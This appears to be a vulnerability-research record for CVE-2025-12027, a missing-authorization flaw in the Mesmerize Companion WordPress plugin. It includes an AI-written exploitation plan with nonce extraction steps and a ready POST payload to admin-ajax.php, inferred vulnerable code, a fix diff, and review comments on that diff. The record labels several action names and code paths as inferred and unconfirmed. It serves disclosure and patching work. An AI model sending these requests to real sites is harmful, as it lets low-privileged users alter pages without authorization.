[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f8NkWcboIDvs4oVjsvSBXxEEjrUTQ31jZD7neg7fD27Y":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2025-12027","mesmerize-companion-missing-authorization-authenticated-subscriber-settings-update","Mesmerize Companion \u003C= 1.6.158 - Missing Authorization Authenticated (Subscriber+) Settings Update","The Mesmerize Companion plugin for WordPress is vulnerable to unauthorized access and modification of data due to a missing capability check on the \"openPageInCustomizer\" and \"openPageInDefaultEditor\" functions in all versions up to, and including, 1.6.158. 
This makes it possible for authenticated attackers - with subscriber level access and above, on websites with the Mesmerize theme activated -  to mark arbitrary pages as maintainable, wrap their content in custom sections, change page template metadata, and toggle the default editor flag without proper authorization.","mesmerize-companion",null,"\u003C=1.6.158","1.6.162","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-02-18 00:00:00","2026-02-19 03:25:10",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F242a3c60-b8ca-43cc-92d7-eb3830381512?source=api-prod",1,[],"researched",false,3,"# Exploitation Research Plan: CVE-2025-12027 - Mesmerize Companion Missing Authorization\n\n## 1. Vulnerability Summary\nThe **Mesmerize Companion** plugin (\u003C= 1.6.158) contains a missing authorization vulnerability in its AJAX handlers. Specifically, the functions `openPageInCustomizer` and `openPageInDefaultEditor` (likely mapped to AJAX actions) do not perform sufficient capability checks (e.g., `current_user_can('edit_pages')`). This allows any authenticated user, including those with **Subscriber** privileges, to modify post metadata and state for arbitrary pages, provided the **Mesmerize theme** is active. \n\nThe impact includes marking pages as \"maintainable\" by the plugin's builder, changing templates, and toggling the editor mode, which can disrupt site layout or prepare pages for further manipulation.\n\n## 2. 
Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Actions (Inferred):** \n    *   `mesmerize_open_page_in_customizer` (likely maps to `openPageInCustomizer`)\n    *   `mesmerize_open_page_in_default_editor` (likely maps to `openPageInDefaultEditor`)\n*   **Parameters:**\n    *   `post_id` or `id`: The ID of the target page to modify.\n    *   `_nonce`: A WordPress nonce for verification (security by obscurity if not properly restricted).\n*   **Authentication:** Subscriber level (PR:L).\n*   **Precondition:** The **Mesmerize** theme must be the active theme.\n\n## 3. Code Flow (Inferred)\n1.  **Registration:** The plugin registers AJAX handlers during `init` or `admin_init`.\n    *   `add_action('wp_ajax_mesmerize_open_page_in_customizer', array($this, 'openPageInCustomizer'));`\n2.  **Execution:** When the AJAX action is called:\n    *   The function retrieves the `post_id` from `$_REQUEST`.\n    *   It performs a `wp_verify_nonce` check.\n    *   **The Vulnerability:** It fails to call `current_user_can('edit_page', $post_id)`.\n3.  **Sink:** \n    *   `update_post_meta($post_id, 'mesmerize_managed_page', '1')` (inferred meta key).\n    *   `update_post_meta($post_id, '_wp_page_template', ...)`\n    *   Changes the post status or content wrapper to make it compatible with the Mesmerize builder.\n\n## 4. Nonce Acquisition Strategy\nThe Mesmerize Companion plugin typically localizes its configuration data for the WordPress admin dashboard or the customizer.\n\n1.  **Shortcode\u002FPage Requirement:** The plugin's admin scripts load on standard admin pages. Since a Subscriber can access `\u002Fwp-admin\u002Fprofile.php`, we can extract the nonce from there if the script is enqueued globally for authenticated users.\n2.  
**Identification:** Look for `wp_localize_script` calls in the plugin source (e.g., in `src\u002FCompanion.php` or similar).\n    *   **Likely JS Variable:** `mesmerize_companion_common` or `MesmerizeCompanion`.\n    *   **Likely Nonce Key:** `nonce`.\n3.  **Extraction Steps:**\n    *   Log in as a **Subscriber**.\n    *   Navigate to `\u002Fwp-admin\u002Findex.php`.\n    *   Execute JS: `browser_eval(\"window.mesmerize_companion_common?.nonce || window.MesmerizeCompanion?.nonce\")`.\n\n## 5. Exploitation Strategy\nWe will attempt to mark a high-value page (e.g., the Home page or a \"Privacy Policy\" page) as \"Maintainable\" in the Mesmerize Customizer, which triggers metadata changes.\n\n### Step 1: Target Identification\n*   Find the ID of a page owned by the administrator.\n\n### Step 2: Request Construction\n*   **Action:** `mesmerize_open_page_in_customizer`\n*   **Method:** POST\n*   **URL:** `http:\u002F\u002F\u003Ctarget>\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Payload:**\n    ```\n    action=mesmerize_open_page_in_customizer&id=\u003CTARGET_PAGE_ID>&_nonce=\u003CEXTRACTED_NONCE>\n    ```\n\n### Step 3: Execution via `http_request`\n```javascript\n\u002F\u002F Example Payload for the automated agent\nawait http_request({\n  url: \"http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php\",\n  method: \"POST\",\n  headers: { \"Content-Type\": \"application\u002Fx-www-form-urlencoded\" },\n  body: \"action=mesmerize_open_page_in_customizer&id=2&_nonce=a1b2c3d4e5\"\n});\n```\n\n## 6. Test Data Setup\n1.  **Theme:** Install and activate the `mesmerize` theme.\n2.  **Plugin:** Install `mesmerize-companion` version `1.6.158`.\n3.  **User:** Create a user `attacker` with the `subscriber` role.\n4.  **Target Content:** Ensure a page with ID `2` (default for \"Sample Page\") exists and is NOT currently \"maintained\" by Mesmerize.\n\n## 7. 
Expected Results\n*   **HTTP Response:** A success JSON response (e.g., `{\"success\": true}`) or a `302` redirect to the Customizer URL.\n*   **State Change:** The target page's metadata will be updated to reflect it is now managed by the Mesmerize Companion.\n\n## 8. Verification Steps\nAfter the exploit request, verify using `wp-cli`:\n1.  **Check Post Meta:**\n    `wp post meta get 2 mesmerize_managed_page`\n    (Expected: `1`)\n2.  **Check Template:**\n    `wp post meta get 2 _wp_page_template`\n    (Expected: A template specific to Mesmerize, e.g., `templates\u002Ffull-width-page.php`)\n\n## 9. Alternative Approaches\nIf `mesmerize_open_page_in_customizer` is not the exact action name:\n1.  **Grep for AJAX registration:**\n    `grep -r \"wp_ajax_\" wp-content\u002Fplugins\u002Fmesmerize-companion\u002F`\n2.  **Search for function definitions:**\n    `grep -r \"function openPageInCustomizer\" wp-content\u002Fplugins\u002Fmesmerize-companion\u002F`\n3.  **Alternative Action:** Try `mesmerize_open_page_in_default_editor` to toggle the editor flag.\n    *   Payload: `action=mesmerize_open_page_in_default_editor&id=\u003CID>&_nonce=\u003CNONCE>`\n    *   Verification: Check if `mesmerize_managed_page` meta is deleted or set to `0`.","The Mesmerize Companion plugin (\u003C= 1.6.158) fails to perform authorization checks in its AJAX handlers `openPageInCustomizer` and `openPageInDefaultEditor`. This allows authenticated attackers with Subscriber-level privileges to modify post metadata and state for arbitrary pages, such as marking them as managed by the plugin's custom builder or changing page templates, provided the Mesmerize theme is active.","\u002F\u002F Inferred from Research Plan - likely in src\u002FCompanion.php or similar\n\npublic function openPageInCustomizer() {\n    $post_id = $_REQUEST['id'];\n    \u002F\u002F Missing capability check like current_user_can('edit_post', $post_id)\n    if ( ! 
wp_verify_nonce( $_REQUEST['_nonce'], 'mesmerize_companion_nonce' ) ) {\n        return;\n    }\n\n    update_post_meta($post_id, 'mesmerize_managed_page', '1');\n    \u002F\u002F ... (logic to redirect to customizer or return success response)\n}\n\n---\n\npublic function openPageInDefaultEditor() {\n    $post_id = $_REQUEST['id'];\n    \u002F\u002F Missing capability check like current_user_can('edit_post', $post_id)\n    if ( ! wp_verify_nonce( $_REQUEST['_nonce'], 'mesmerize_companion_nonce' ) ) {\n        return;\n    }\n\n    update_post_meta($post_id, 'mesmerize_managed_page', '0');\n    \u002F\u002F ... (logic to return success response)\n}","--- a\u002Fsrc\u002FCompanion.php\n+++ b\u002Fsrc\u002FCompanion.php\n@@ -100,6 +100,10 @@\n     public function openPageInCustomizer() {\n         $post_id = $_REQUEST['id'];\n+\n+        if ( ! current_user_can( 'edit_post', $post_id ) ) {\n+            wp_die( __( 'You do not have permission to edit this post.' ) );\n+        }\n+\n         if ( ! wp_verify_nonce( $_REQUEST['_nonce'], 'mesmerize_companion_nonce' ) ) {\n             return;\n         }\n@@ -120,6 +124,10 @@\n     public function openPageInDefaultEditor() {\n         $post_id = $_REQUEST['id'];\n+\n+        if ( ! current_user_can( 'edit_post', $post_id ) ) {\n+            wp_die( __( 'You do not have permission to edit this post.' ) );\n+        }\n+\n         if ( ! wp_verify_nonce( $_REQUEST['_nonce'], 'mesmerize_companion_nonce' ) ) {\n             return;\n         }","1. Authentication: Log in to the target WordPress site with a Subscriber-level account.\n2. Nonce Acquisition: Access a standard admin page (e.g., `\u002Fwp-admin\u002Fprofile.php`) and extract the security nonce from the `mesmerize_companion_common` or `MesmerizeCompanion` JavaScript object localized on the page.\n3. Identify Target: Choose a target Page ID (e.g., ID 2 for the default Sample Page).\n4. 
Execute Modification: Send a POST request to `\u002Fwp-admin\u002Fadmin-ajax.php` using the action `mesmerize_open_page_in_customizer` (to enable builder mode) or `mesmerize_open_page_in_default_editor` (to disable it), including the `id` of the target page and the extracted `_nonce`.\n5. Verification: Confirm the metadata change by checking the `mesmerize_managed_page` key via the database or observing layout changes on the frontend.","gemini-3-flash-preview","2026-04-19 05:24:50","2026-04-19 05:25:11",{"type":34,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":35},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fmesmerize-companion\u002Ftags"]
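Review bot: In the first hunk (`openPageInCustomizer`), `$post_id = $_REQUEST['id'];` is still passed unnormalized to `current_user_can( 'edit_post', $post_id )` and, further down, to the metadata update. Suggest `$post_id = isset( $_REQUEST['id'] ) ? absint( $_REQUEST['id'] ) : 0;` and rejecting the request when the result is 0, so the capability check and the later write always operate on the same integer ID. The `__()` call in the new `wp_die()` also has no text domain, so the message will not be picked up by the plugin's translations.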
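Review bot: In the second hunk (`openPageInDefaultEditor`), the two rejection paths now behave differently: the new capability failure calls `wp_die()` with a message, while the nonce failure in the unchanged context lines is still a bare `return;`. Suggest making both fail explicitly and in the same way, for example `check_ajax_referer( 'mesmerize_companion_nonce', '_nonce' )` for the nonce and a `wp_send_json_error()` with a 403 status for the capability failure, so clients and logs can tell a rejected request from a successful one. The same applies to the identical lines in the first hunk.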